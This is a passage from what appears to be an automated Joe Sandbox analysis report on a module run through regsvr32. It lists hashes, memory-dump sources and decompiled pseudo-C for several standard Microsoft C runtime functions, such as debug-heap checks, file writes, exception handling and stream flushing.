                                                      • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                      • Instruction ID: f463794f61061979348d28cf0890255f55ae464b61bc66257c006d95a81b41bb
                                                      • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                      • Instruction Fuzzy Hash: A8316372A18B85C6D790CB28E88066E77A1F7857A5F604325E6FE47AF9CB3DD441CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D26210 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_unlock
                                                      • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 2816345473-1282596470
                                                      • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                      • Instruction ID: 0c290ab1c852a48438f6a901ce88093280091c3cb9967e086700a94ae8aeefb6
                                                      • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                      • Instruction Fuzzy Hash: 18313371D1D2428AE3A08B68ED4476E77E0F741364F615236A6CD866F4D77EE4488B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D40070 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock$_unlock
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                      • API String ID: 2500497606-1087415141
                                                      • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                      • Instruction ID: 34f18152e293ad813cf8b9b11c4969fef8ff7405ef187e896dde4a1f66726313
                                                      • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                      • Instruction Fuzzy Hash: 4121FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D35393 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                      • String ID: csm
                                                      • API String ID: 933340387-1018135373
                                                      • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                      • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                                      • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                      • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D39694 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno_invalid_parameter
                                                      • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 4140903211-23161695
                                                      • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                      • Instruction ID: f549bc85806da522572ee7890384280d6aac56d4f037a7782e26525923b50f93
                                                      • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                      • Instruction Fuzzy Hash: A2112A71A29606CAF7D0AB14ED5476E72E1F3507C9FA09125E2CD026E4D77EE504CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D39939 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno_invalid_parameter
                                                      • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 4140903211-3042049227
                                                      • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                      • Instruction ID: 08953b95d21c5f70e3699fefb321eca4419d040150facc41ebc10b04699de718
                                                      • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                      • Instruction Fuzzy Hash: F8115731E0C646DAF7A4AF24EC117AE73D0F780398FA0912692CC026E5DB7EE644CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3976D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno_invalid_parameter
                                                      • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 4140903211-1338331675
                                                      • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                      • Instruction ID: 8bdd68c2d8658697f17e3158693f35fff5fb9c26cbdf8bf42c76b87004d789dc
                                                      • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                      • Instruction Fuzzy Hash: F0014CB1A18646C6FB90AB24EC4076D36E0F350358FB04125E28D036F5C7BED544CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D39A9B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer__doserrno_invalid_parameter
                                                      • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 1098298932-1795423647
                                                      • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                      • Instruction ID: 5ff663975ae3511ed6d2782a661d896beba523f0d1828ccbc0613956f22d1229
                                                      • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                      • Instruction Fuzzy Hash: CBE03960A0890696F6D4AF14EC113EE2290A740788FE14222908D072F2CB7EA605C741
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2F570 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 16%
                                                      			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				signed int _v48;
				int _v52;
				int _v56;
				signed int _v64;
				long long _v72;
				long long _t82;

				_a32 = r9d;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_v56 = 0;
				if (_a48 != 0) goto 0xf9d2f5ab;
				_a48 =  *((intOrPtr*)( *_a8 + 4));
				if (_a64 == 0) goto 0xf9d2f5bf;
				_v32 = 9;
				goto 0xf9d2f5c7;
				_v32 = 1;
				_v64 = 0;
				_v72 = 0;
				r9d = _a32;
				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v48 != 0) goto 0xf9d2f60b;
				goto 0xf9d2f6f8;
				if (0 != 0) goto 0xf9d2f652;
				if (_v48 <= 0) goto 0xf9d2f652;
				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
				_t82 = _v48 + _v48 + 0x10;
				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
				_v24 = _t82;
				goto 0xf9d2f65b;
				_v24 = 0;
				_v40 = _v24;
				if (_v40 != 0) goto 0xf9d2f674;
				goto 0xf9d2f6f8;
				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
				_v64 = _v48;
				_v72 = _v40;
				r9d = _a32;
				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v52 == 0) goto 0xf9d2f6ea;
				r8d = _v52;
				_v56 = GetStringTypeW(??, ??, ??, ??);
				E000007FE7FEF9D2F3E0(_v40);
				return _v56;
			}












                                                      0x7fef9d2f570
                                                      0x7fef9d2f575
                                                      0x7fef9d2f57a
                                                      0x7fef9d2f57e
                                                      0x7fef9d2f587
                                                      0x7fef9d2f597
                                                      0x7fef9d2f5a4
                                                      0x7fef9d2f5b3
                                                      0x7fef9d2f5b5
                                                      0x7fef9d2f5bd
                                                      0x7fef9d2f5bf
                                                      0x7fef9d2f5c7
                                                      0x7fef9d2f5cf
                                                      0x7fef9d2f5d8
                                                      0x7fef9d2f5f9
                                                      0x7fef9d2f602
                                                      0x7fef9d2f606
                                                      0x7fef9d2f60f
                                                      0x7fef9d2f616
                                                      0x7fef9d2f62a
                                                      0x7fef9d2f631
                                                      0x7fef9d2f646
                                                      0x7fef9d2f64b
                                                      0x7fef9d2f650
                                                      0x7fef9d2f652
                                                      0x7fef9d2f660
                                                      0x7fef9d2f66b
                                                      0x7fef9d2f66f
                                                      0x7fef9d2f686
                                                      0x7fef9d2f68f
                                                      0x7fef9d2f698
                                                      0x7fef9d2f69d
                                                      0x7fef9d2f6bf
                                                      0x7fef9d2f6c8
                                                      0x7fef9d2f6d2
                                                      0x7fef9d2f6e6
                                                      0x7fef9d2f6ef
                                                      0x7fef9d2f6fc

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                      • String ID:
                                                      • API String ID: 2618398691-0
                                                      • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                      • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                                      • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                      • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3FF00 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
				signed int _v16;
				signed int _v20;
				signed int _v24;

				_a8 = __ecx;
				_v24 = 0;
				_v16 = 0;
				0xf9d29300();
				_v20 = 0;
				_v20 = _v20 + 1;
				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
				if (_a8 != 1) goto 0xf9d3ffe1;
				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
				_v24 = _v24 + 1;
				goto 0xf9d40024;
				if (_a8 != 0) goto 0xf9d40024;
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
				_v16 = 0xffffffff;
				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
				goto L1;
				__ecx = 1;
				__eax = E000007FE7FEF9D29360(__eax, 1);
				if (_a8 != 1) goto 0xf9d4005b;
				__eax = _v24;
				goto 0xf9d4005f;
				__eax = _v16;
				return _v16;
			}






                                                      0x7fef9d3ff00
                                                      0x7fef9d3ff08
                                                      0x7fef9d3ff10
                                                      0x7fef9d3ff1d
                                                      0x7fef9d3ff23
                                                      0x7fef9d3ff33
                                                      0x7fef9d3ff41
                                                      0x7fef9d3ff58
                                                      0x7fef9d3ff78
                                                      0x7fef9d3ff92
                                                      0x7fef9d3ffb2
                                                      0x7fef9d3ffb9
                                                      0x7fef9d3ffd3
                                                      0x7fef9d3ffdb
                                                      0x7fef9d3ffdf
                                                      0x7fef9d3ffe6
                                                      0x7fef9d40000
                                                      0x7fef9d4001a
                                                      0x7fef9d4001c
                                                      0x7fef9d40038
                                                      0x7fef9d4003d
                                                      0x7fef9d40042
                                                      0x7fef9d40047
                                                      0x7fef9d40051
                                                      0x7fef9d40053
                                                      0x7fef9d40059
                                                      0x7fef9d4005b
                                                      0x7fef9d40063

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                      • String ID:
                                                      • API String ID: 1144694634-0
                                                      • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                      • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                                      • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                      • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D33CC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				long long _v16;
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v64;
				long long _v72;
				char _v80;
				long long _v88;
				void* _t135;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int* _t200;
				intOrPtr _t206;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				0xf9d24000();
				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
				goto 0xf9d3409c;
				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
				if (_a40[1] == 0) goto 0xf9d33ee4;
				if (_a48 != 0) goto 0xf9d33ee4;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
				goto 0xf9d33e0f;
				E000007FE7FEF9D2CF80(_a40);
				r9d = _v56;
				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
				goto 0xf9d33ec7;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
				_v48 = _a8;
				_v52 =  *((intOrPtr*)(_v48 + 0x38));
				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
				goto 0xf9d33e9a;
				E000007FE7FEF9D2CF80(_a40);
				r9d = _v52;
				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
				goto 0xf9d3409c;
				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
				goto 0xf9d34097;
				if (_a40[3] != 0) goto 0xf9d33f59;
				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
				_t200 = _a40;
				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
				_v24 = _t200 + _a40[8];
				goto 0xf9d33f4d;
				_v24 = 0;
				if (_v24 == 0) goto 0xf9d34097;
				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
				_t206 =  *((intOrPtr*)(_a8 + 0x30));
				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
				E000007FE7FEF9D2E6A0(_t135, _t206);
				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
				goto 0xf9d33fce;
				_v16 = 0;
				_v40 = _v16;
				_t177 = _v40;
				if (_v40 == 0) goto 0xf9d34041;
				_v64 = _a64 & 0x000000ff;
				_v72 = _a56;
				_v80 = _a48;
				_v88 = _a40;
				_v32 = _v40();
				goto 0xf9d34097;
				_v64 = _a56;
				_v72 = _a48;
				_v80 = _a64 & 0x000000ff;
				_v88 = _a40;
				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
				return 1;
			}





















                                                      0x7fef9d33cc0
                                                      0x7fef9d33cc5
                                                      0x7fef9d33cca
                                                      0x7fef9d33ccf
                                                      0x7fef9d33cd8
                                                      0x7fef9d33ce4
                                                      0x7fef9d33cf8
                                                      0x7fef9d33d08
                                                      0x7fef9d33d16
                                                      0x7fef9d33d28
                                                      0x7fef9d33d38
                                                      0x7fef9d33d4e
                                                      0x7fef9d33d60
                                                      0x7fef9d33d67
                                                      0x7fef9d33d7c
                                                      0x7fef9d33d8e
                                                      0x7fef9d33d9c
                                                      0x7fef9d33db2
                                                      0x7fef9d33dc6
                                                      0x7fef9d33dec
                                                      0x7fef9d33df5
                                                      0x7fef9d33e06
                                                      0x7fef9d33e08
                                                      0x7fef9d33e0a
                                                      0x7fef9d33e0f
                                                      0x7fef9d33e2c
                                                      0x7fef9d33e3b
                                                      0x7fef9d33e50
                                                      0x7fef9d33e60
                                                      0x7fef9d33e6a
                                                      0x7fef9d33e77
                                                      0x7fef9d33e80
                                                      0x7fef9d33e91
                                                      0x7fef9d33e93
                                                      0x7fef9d33e95
                                                      0x7fef9d33e9a
                                                      0x7fef9d33eb8
                                                      0x7fef9d33ec2
                                                      0x7fef9d33edf
                                                      0x7fef9d33eee
                                                      0x7fef9d33eff
                                                      0x7fef9d33f15
                                                      0x7fef9d33f1b
                                                      0x7fef9d33f27
                                                      0x7fef9d33f29
                                                      0x7fef9d33f3d
                                                      0x7fef9d33f42
                                                      0x7fef9d33f44
                                                      0x7fef9d33f53
                                                      0x7fef9d33f67
                                                      0x7fef9d33f79
                                                      0x7fef9d33f8e
                                                      0x7fef9d33f9c
                                                      0x7fef9d33fa4
                                                      0x7fef9d33fa6
                                                      0x7fef9d33fbe
                                                      0x7fef9d33fc3
                                                      0x7fef9d33fc5
                                                      0x7fef9d33fd3
                                                      0x7fef9d33fd8
                                                      0x7fef9d33fde
                                                      0x7fef9d33fe8
                                                      0x7fef9d33ff4
                                                      0x7fef9d34000
                                                      0x7fef9d3400c
                                                      0x7fef9d34035
                                                      0x7fef9d3403f
                                                      0x7fef9d34049
                                                      0x7fef9d34055
                                                      0x7fef9d34061
                                                      0x7fef9d3406d
                                                      0x7fef9d34092
                                                      0x7fef9d340a0

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _inconsistency
                                                      • String ID: csm$csm
                                                      • API String ID: 32975420-3733052814
                                                      • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                      • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                                      • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                      • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D29640 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
